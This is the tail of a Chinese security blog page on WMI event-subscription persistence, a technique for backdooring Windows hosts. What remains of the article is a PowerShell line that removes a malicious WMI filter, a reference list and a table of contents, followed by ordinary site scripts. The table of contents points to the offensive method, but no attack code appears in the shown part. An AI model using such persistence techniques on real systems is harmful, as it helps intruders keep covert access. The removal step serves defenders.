&apos;%BotFilter82%&apos;&quot; | Remove-WmiObject -Verbose</span><br></pre></td></tr></table></figure>
<h2 id="0x05-参考"><a href="#0x05-参考" class="headerlink" title="0x05 参考"></a>0x05 参考</h2><p><a href="https://www.mdsec.co.uk/2019/05/persistence-the-continued-or-prolonged-existence-of-something-part-3-wmi-event-subscription/" target="_blank" rel="noopener">Persistence: “the continued or prolonged existence of something”: Part 3 – WMI Event Subscription</a><br><a href="https://wooyun.x10sec.org/static/drops/tips-8189.html" target="_blank" rel="noopener">WMI Attacks</a><br><a href="https://4hou.win/wordpress/?p=17080" target="_blank" rel="noopener">利用WMI构建无文件后门（基础篇）</a></p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        
  <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
    <div>！坚持技术分享，您的支持将鼓励我继续创作！</div>
    <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
      <span>赏</span>
    </button>
    <div id="QR" style="display: none;">
      
        <div id="wechat" style="display: inline-block">
          <img id="wechat_qr" src="/images/wechatpay.jpg" alt="RcoIl WeChat Pay">
          <p>微信打赏</p>
        </div>
      
      
    </div>
  </div>


      
    </div>

    <div>
      
        
  <ul class="post-copyright">
    <li class="post-copyright-author">
      <strong>本文作者：</strong>
      RcoIl
    </li>
    <li class="post-copyright-link">
      <strong>本文链接：</strong>
      <a href="https://rcoil.me/2019/05/永久性 WMIC 事件订阅 - 权限维持（三）/" title="永久性 WMIC 事件订阅 - 权限维持（三）">https://rcoil.me/2019/05/永久性 WMIC 事件订阅 - 权限维持（三）/</a>
    </li>
    <li class="post-copyright-license">
      <strong>版权声明： </strong>
      本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处！
    </li>
  </ul>


      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/内网渗透/" rel="tag"><i class="fa fa-tag" aria-hidden="true"></i> 内网渗透</a>
          
            <a href="/tags/权限维持/" rel="tag"><i class="fa fa-tag" aria-hidden="true"></i> 权限维持</a>
          
        </div>
      

      
        
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/05/Microsoft Office - 权限维持（一）/" rel="next" title="Microsoft Office - 权限维持（一）">
                <i class="fa fa-chevron-left"></i> Microsoft Office - 权限维持（一）
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </article>


    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div id="lv-container" data-id="city" data-uid="MTAyMC8yODE5NS80NzY4"></div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image" src="/images/avatar.png" alt="RcoIl">
          <p class="site-author-name" itemprop="name">RcoIl</p>
           
              <p class="site-description motion-element" itemprop="description">好吃懒做，还有就是皮肤比黄皮果还黄！</p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">32</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">7</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">18</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        
          <div class="feed-link motion-element">
            <a href="/atom.xml" rel="alternate">
              <i class="fa fa-rss"></i>
              RSS
            </a>
          </div>
        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/RcoIl" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://mail.qq.com/cgi-bin/qm_share?t=qm_mailme&email=rcoil@qq.com" target="_blank" title="Email">
                  
                    <i class="fa fa-fw fa-fa fa-envelope-open"></i>
                  
                  Email
                </a>
              </span>
            
          
        </div>

        
        
		
		
          <div class="feed-link motion-element">
            <div id="days"></div>
			<script language="javascript">
			function show_date_time(){
				window.setTimeout("show_date_time()", 1000);
				BirthDay=new Date("09/01/2016 10:13:14");
				today=new Date();
				timeold=(today.getTime()-BirthDay.getTime());
				sectimeold=timeold/1000
				secondsold=Math.floor(sectimeold);
				msPerDay=24*60*60*1000
				e_daysold=timeold/msPerDay
				daysold=Math.floor(e_daysold);
				e_hrsold=(e_daysold-daysold)*24;
				hrsold=setzero(Math.floor(e_hrsold));
				e_minsold=(e_hrsold-hrsold)*60;
				minsold=setzero(Math.floor((e_hrsold-hrsold)*60));
				seconds=setzero(Math.floor((e_minsold-minsold)*60));
				document.getElementById('days').innerHTML="本站已运行 "+daysold+" 天 "+hrsold+" 小时 "+minsold+" 分"+ seconds +" 秒";
			}
			function setzero(i){
				if (i<10)
				{i="0" + i};
				return i;
			}		
			show_date_time();
		</script>
        </div>
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-inline">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              Links
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="http://isron.cn/" title="Isron" target="_blank">Isron</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://hacktech.cn/" title="Akkuman" target="_blank">Akkuman</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://rootrain.me/" title="rootrain" target="_blank">rootrain</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://kerlinglovsec.lofter.com/" title="kerling" target="_blank">kerling</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://www.luolikong.vip/" title="Fire-ant" target="_blank">Fire-ant</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://xnianq.cn/" title="xniang" target="_blank">xniang</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://thief.one/" title="nMask" target="_blank">nMask</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://cate4cafe.com/" title="cate4cafe" target="_blank">cate4cafe</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://52stu.me/" title="心的开始" target="_blank">心的开始</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://klionsec.github.io/" title="klion" target="_blank">klion</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://hone.cool/" title="Hone" target="_blank">Hone</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://evi1cg.me/" title="Evi1cg" target="_blank">Evi1cg</a>
                </li>
              
            </ul>
          </div>
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x00-前言"><span class="nav-number">1.</span> <span class="nav-text">0x00 前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-查询-WMI"><span class="nav-number">2.</span> <span class="nav-text">0x01 查询 WMI</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-1-Instance-Queries"><span class="nav-number">2.1.</span> <span class="nav-text">1.1 Instance Queries</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#1-2-Event-Queries"><span class="nav-number">2.2.</span> <span class="nav-text">1.2 Event Queries</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#1-3-Meta-Queries"><span class="nav-number">2.3.</span> <span class="nav-text">1.3 Meta Queries</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02-与WMI交互"><span class="nav-number">3.</span> <span class="nav-text">0x02 与WMI交互</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x03-WMI事件"><span class="nav-number">4.</span> <span class="nav-text">0x03 WMI事件</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#3-1-前置条件"><span class="nav-number">4.1.</span> <span class="nav-text">3.1 前置条件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-2-测试"><span class="nav-number">4.2.</span> <span class="nav-text">3.2 测试</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-3-Powershell-实例（命令执行）"><span class="nav-number">4.3.</span> <span class="nav-text">3.3 Powershell 实例（命令执行）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-4-C-实例（代码执行）"><span class="nav-number">4.4.</span> <span class="nav-text">3.4 C# 实例（代码执行）</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x04-WMI后门检测及清除"><span class="nav-number">5.</span> <span class="nav-text">0x04 WMI后门检测及清除</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#4-1-Sysmon日志"><span class="nav-number">5.1.</span> <span class="nav-text">4.1 Sysmon日志</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-2-查看当前WMI-Event"><span class="nav-number">5.2.</span> <span class="nav-text">4.2 查看当前WMI Event</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-3-清除后门"><span class="nav-number">5.3.</span> <span class="nav-text">4.3 清除后门</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x05-参考"><span class="nav-number">6.</span> <span class="nav-text">0x05 参考</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">
  
  &copy;  2016 - 
  <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
<!--
    <i class="fa fa-heart"></i>
-->
	<i class="fa fa-address-card-o" aria-hidden="true"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">RcoIl</span>
</div>
<!--

<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Mist
  </a>
</div>
-->


        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-blind" aria-hidden="true"></i>本站访客数
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      人
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-user-md" aria-hidden="true"></i>本站总访问量
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      次
    </span>
  
</div>


        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  






  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.0"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.0"></script>



  


  




	





  





  





  
    <script type="text/javascript">
      (function(d, s) {
        var j, e = d.getElementsByTagName(s)[0];
        if (typeof LivereTower === 'function') { return; }
        j = d.createElement(s);
        j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
        j.async = true;
        e.parentNode.insertBefore(j, e);
      })(document, 'script');
    </script>
  






  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length == 0) {
      search_path = "search.xml";
    }
    var path = "/" + search_path;
    // monitor main search box;

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.popup').toggle();
    }
    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';
      $.ajax({
        url: path,
        dataType: "xml",
        async: true,
        success: function( xmlResponse ) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = $( "entry", xmlResponse ).map(function() {
            return {
              title: $( "title", this ).text(),
              content: $("content",this).text(),
              url: $( "url" , this).text()
            };
          }).get();
          var $input = document.getElementById(search_id);
          var $resultContent = document.getElementById(content_id);
          $input.addEventListener('input', function(){
            var matchcounts = 0;
            var str='<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length > 1) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var content_index = [];
                var data_title = data.title.trim().toLowerCase();
                var data_content = data.content.trim().replace(/<[^>]+>/g,"").toLowerCase();
                var data_url = decodeURIComponent(data.url);
                var index_title = -1;
                var index_content = -1;
                var first_occur = -1;
                // only match artiles with not empty titles and contents
                if(data_title != '') {
                  keywords.forEach(function(keyword, i) {
                    index_title = data_title.indexOf(keyword);
                    index_content = data_content.indexOf(keyword);
                    if( index_title >= 0 || index_content >= 0 ){
                      isMatch = true;
                      if (i == 0) {
                        first_occur = index_content;
                      }
                    }

                  });
                }
                // show search results
                if (isMatch) {
                  matchcounts += 1;
                  str += "<li><a href='"+ data_url +"' class='search-result-title'>"+ data_title +"</a>";
                  var content = data.content.trim().replace(/<[^>]+>/g,"");
                  if (first_occur >= 0) {
                    // cut out 100 characters
                    var start = first_occur - 20;
                    var end = first_occur + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if(start == 0){
                      end = 50;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    var match_content = content.substring(start, end);
                    // highlight all keywords
                    keywords.forEach(function(keyword){
                      var regS = new RegExp(keyword, "gi");
                      match_content = match_content.replace(regS, "<b class=\"search-keyword\">"+keyword+"</b>");
                    });

                    str += "<p class=\"search-result\">" + match_content +"...</p>"
                  }
                  str += "</li>";
                }
              })};
            str += "</ul>";
            if (matchcounts == 0) { str = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>' }
            if (keywords == "") { str = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>' }
            $resultContent.innerHTML = str;
          });
          proceedsearch();
        }
      });}

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched == false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(function(e){
      $('.popup').hide();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    });
    $('.popup').click(function(e){
      e.stopPropagation();
    });
  </script>





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.1.js"></script>
  <script>AV.initialize("KVNdpVifyFqJPx0bzSg6cN7z-gzGzoHsz", "vlNRwqLbdUTKC1W06gjYj0iG");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  

</body>
</html>
